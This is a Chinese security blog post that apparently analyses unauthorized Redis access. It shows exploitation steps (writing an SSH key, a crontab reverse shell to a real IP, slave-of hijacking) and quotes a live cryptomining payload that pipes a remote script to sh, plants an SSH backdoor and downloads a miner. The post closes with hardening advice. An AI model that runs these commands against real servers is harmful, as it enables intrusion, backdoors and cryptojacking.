Redis未授權通路漏洞分析
1. Redis簡介
Relevant Link:
http://www.cnblogs.com/LittleHann/p/3901588.html 2. 漏洞概述
Redis 預設情況下,會綁定在 0.0.0.0:6379,這樣将會将 Redis 服務暴露到公網上,如果在沒有開啟認證的情況下,可以導緻任意使用者在可以通路目标伺服器的情況下未授權通路 Redis 以及讀取 Redis 的資料。攻擊者在未授權通路 Redis 的情況下可以利用 Redis 的相關方法,可以成功在 Redis 伺服器上寫入公鑰,進而可以使用對應私鑰直接登入目标伺服器
0x1: 漏洞描述
Redis安全模型的觀念是: "請不要将Redis暴露在公開網絡中, 因為讓不受信任的客戶接觸到Redis是非常危險的"
Redis 作者之是以放棄解決未授權通路導緻的不安全性是因為
1. 99.99%使用Redis的場景都是在沙盒化的環境中,為了0.01%的可能性增加安全規則的同時也增加了複雜性
2. 雖然這個問題的并不是不能解決的, 但是這在他的設計哲學中仍是不劃算的 因為其他受信任使用者需要使用Redis或者因為運維人員的疏忽等原因,部分Redis 綁定在0.0.0.0:6379,并且沒有開啟認證(這是Redis的預設配置),如果沒有進行采用相關的政策,比如添加防火牆規則避免其他非信任來源ip通路等,将會導緻Redis服務直接暴露在公網上,導緻其他使用者可以直接在非授權情況下直接通路Redis服務并進行相關操作
利用Redis自身的相關方法,可以進行寫檔案操作,攻擊者可以成功将自己的公鑰寫入目标伺服器的 /root/.ssh 檔案夾的authotrized_keys 檔案中,進而可以直接登入目标伺服器
0x2: 漏洞利用條件
1. redis服務以root賬戶運作
2. redis無密碼或弱密碼進行認證
3. redis監聽在0.0.0.0公網上 http://www.cnblogs.com/yangecnu/p/An-Production-Accidents-Caused-by-Redis-Attacked.html 2. 漏洞利用方式
0x1: 資料庫資料洩露
Redis 作為資料庫,儲存着各種各樣的資料,如果存在未授權通路的情況,将會導緻資料的洩露,其中包含儲存的使用者資訊等
0x2: 敏感資訊洩露
通過 Redis 的 INFO 指令, 可以檢視伺服器相關的參數和敏感資訊, 為攻擊者的後續滲透做鋪墊
# Server
redis_version:2.8.13
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:161beea97cb9b816
redis_mode:standalone
os:Linux 2.6.32-431.23.3.el6.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.7
process_id:12537
run_id:977eace0aacf7c702db5ff0b689cf23cf0936dbc
tcp_port:6379
uptime_in_seconds:17725
uptime_in_days:0
hz:10
lru_clock:4493657
config_file:
# Clients
connected_clients:1
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:810968
used_memory_human:791.96K
used_memory_rss:2359296
used_memory_peak:810968
used_memory_peak_human:791.96K
used_memory_lua:36864
mem_fragmentation_ratio:2.91
mem_allocator:jemalloc-3.6.0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1447333284
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:5
total_commands_processed:5
instantaneous_ops_per_sec:0
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:1
keyspace_misses:1
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:233
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:10.47
used_cpu_user:7.25
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
127.0.0.1:6379>
[root@iZ23er0navtZ ~]# redis-cli
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379>
[root@iZ23er0navtZ ~]# redis-cli
127.0.0.1:6379> keys *
(error) ERR operation not permitted
127.0.0.1:6379>
[root@iZ23er0navtZ ~]# redis-cli -h 127.0.0.1 -p 6379 -a littlehann
127.0.0.1:6379> keys *
(empty list or set)
127.0.0.1:6379>
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# redis-cli eval "$(echo hacker /tmp/shell)" 0 -a littlehann
(error) ERR unknown command 'eval'
[root@iZ23er0navtZ ~]# clear
[root@iZ23er0navtZ ~]# redis-cli
127.0.0.1:6379> auth littlehann
OK
127.0.0.1:6379> eval "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'eval'
127.0.0.1:6379> EVAL "$(echo hacker /tmp/shell)" 0
(error) ERR unknown command 'EVAL'
127.0.0.1:6379> info
redis_version:2.4.10
redis_git_sha1:00000000
redis_git_dirty:0
arch_bits:64
multiplexing_api:epoll
gcc_version:4.4.6
process_id:12766
uptime_in_seconds:3970
uptime_in_days:0
lru_clock:30359
used_cpu_sys:0.46
used_cpu_user:0.73
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
connected_clients:1
connected_slaves:0
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
used_memory:726176
used_memory_human:709.16K
used_memory_rss:1634304
used_memory_peak:726168
used_memory_peak_human:709.15K
mem_fragmentation_ratio:2.25
mem_allocator:jemalloc-2.2.5
loading:0
aof_enabled:0
changes_since_last_save:0
bgsave_in_progress:0
last_save_time:1447334503
bgrewriteaof_in_progress:0
total_connections_received:7
total_commands_processed:4
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
vm_enabled:0
role:master 0x3: 上傳SSH公鑰獲得SSH登入權限
//首先在本地生産公私鑰檔案:
ssh-keygen –t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa key_pub\n\n\n"
//xxxx為任意
//其中key_pub為上一步生成的公鑰,即可将公鑰儲存在遠端伺服器,使得登入時不需要輸入賬号與密碼
save 這會産生redis程序對/root/.ssh/路徑下進行寫檔案的動作,值得注意的是,ssh預設的公鑰路徑是:/root/.ssh/authorized_keys,如果要自定義其他的公鑰名稱,需要在/root/.ssh/config裡特殊配置,是以黑客必須選擇往/root/.ssh/authorized_keys裡寫入payload
0x4: 通過crontab反彈shell
和定時任務crontab有關的目錄有
1. /var/spool/cron/: 所有使用者定義的 crontab 都被儲存在 /var/spool/cron 目錄中
2. /var/spool/cron/crontabs: ubuntu下在這個目錄
3. /etc/crontab: 針對系統的任務
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root //如果出現錯誤,或者有資料輸出,資料作為郵件發給這個帳号
HOME=/ //使用者運作的路徑,這裡是根目錄
# run-parts
01 * * * * root run-parts /etc/cron.hourly //每小時執行/etc/cron.hourly内的腳本
02 4 * * * root run-parts /etc/cron.daily //每天執行/etc/cron.daily内的腳本
22 4 * * 0 root run-parts /etc/cron.weekly //每星期執行/etc/cron.weekly内的腳本
42 4 1 * * root run-parts /etc/cron.monthly //每月去執行/etc/cron.monthly内的腳本 payload
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/114.215.190.203/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/crontabs/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save 挖礦payload(同時修改ssh配置,提高可登入成功率)
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep yam || /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr" >> /var/spool/cron/root
# echo "*/5 * * * * ps auxf | grep -v grep | grep gg3lady || nohup /opt/gg3lady &" >> /var/spool/cron/root
pkill gg3lady
ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr
fi
# if [ ! -f "/opt/gg3lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg3lady_`uname -i` -o /opt/gg3lady
# chmod +x /opt/gg3lady
# fi
# yam=$(ps auxf | grep yam | grep -v grep | wc -l)
# gg3lady=$(ps auxf | grep gg3lady | grep -v grep | wc -l)
# cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
# curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg3lady=$gg3lady\&arch=`uname -i` 0x5: slave主從模式利用
在Slave啟動并連接配接到Master之後,它将主動發送一個SYNC指令。此後Master将啟動背景存盤程序,同時收集所有接收到的用于修改資料集的指令,在背景程序執行完畢後,Master将傳送整個資料庫檔案到Slave,以完成一次完全同步。而Slave伺服器在接收到資料庫檔案資料之後将其存盤并加載到記憶體中。此後,Master繼續将所有已經收集到的修改指令,和新的修改指令依次傳送給Slaves,Slave将在本次執行這些資料修改指令,進而達到最終的資料同步
如果Master和Slave之間的連結出現斷連現象,Slave可以自動重連Master,但是在連接配接成功之後,一次完全同步将被自動執行
1. 主模式redis(114.215.190.203)
redis-server
2. 從模式redis(218.244.133.201)
redis-server
3. 将目标redis(218.244.133.201是存在漏洞的redis)作為從模式redis和主模式redis建立主從連接配接
redis-cli -h 218.244.133.201 -p 6379
slaveof 114.215.190.203 6379
4. 登入自己控制的主模式redis,執行指令
redis-cli -h 114.215.190.203 -p 6379
set mykey hello
set mykey2 helloworld 此後主模式redis的所有操作都會自動同步到從模式redis中,也就是說我們可以将存在漏洞的redis作為從模式redis,連接配接到我們自己控制的主模式redis上,此後隻要在自己控制的主模式redis上輸入指令即可
0x6: 寫入到etc/profile.d/環境變量
0x7: 開啟AOF持久化純文字記錄 appendfilename
Redis有兩種持久化的方式: 快照(RDB檔案)和追加式檔案(AOF檔案)
1. RDB持久化方式會在一個特定的間隔儲存那個時間點的一個資料快照
2. AOF持久化方式則會記錄每一個伺服器收到的寫操作。在服務啟動時,這些記錄的操作會逐條執行進而重建出原來的資料。寫操作指令記錄的格式跟Redis協定一緻,以追加的方式進行儲存
3. Redis的持久化是可以禁用的,就是說你可以讓資料的生命周期隻存在于伺服器的運作時間裡
4. 兩種方式的持久化是可以同時存在的,但是當Redis重新開機時,AOF檔案會被優先用于重建資料 AOF持久化的這個特點可以被用來持久化payload攻擊
http://www.freebuf.com/vuls/85188.html
https://www.v2ex.com/t/286981#reply14
https://r.chanstring.com/api/report?pm=1 4. 修複方式
0x1: 禁止綁定公網(本地緩存)
1. redis.conf: bind 127.0.0.1
//redis本來就是作為記憶體資料庫,隻要監聽在本機即可 0x2: 密碼驗證
1. 配置認證,也就是AUTH,設定密碼,密碼會以明文方式儲存在Redis配置檔案中 0x3: 降級運作
1. 禁止使用 root 權限啟動 redis 服務
vim /etc/redis/redis.conf
# By default Redis does not run as a daemon. Use 'yes' if you need it.
# Note that Redis will write a pid file in /var/run/redis.pid when daemonized.
daemonize yes 在降級(deamon)模式下,更改配置檔案路徑是不允許的,即"config set dir /root/.ssh/"執行失敗,進而避免了寫任意檔案的風險
0x4: 其他
1. 限定可以連接配接Redis伺服器的IP
2. 修改Redis預設端口6379
3. 配置rename-command配置項"RENAME_CONFIG",這樣即使存在未授權通路,也能夠給攻擊者使用config 指令加大難度 0x5: 禁止從redis寫入主模式redis傳輸的檔案
slave-read-only yes 0x6: 自動化檢測方案
1. 從running程序redis-server中擷取啟動參數中的配置檔案路徑。如果擷取失敗則從預設路徑: /etc/redis/redis.conf
2. 檢查配置key-value對
daemonize yes
bind 127.0.0.1 http://www.freebuf.com/vuls/85021.html Copyright (c) 2015 LittleHann All rights reserved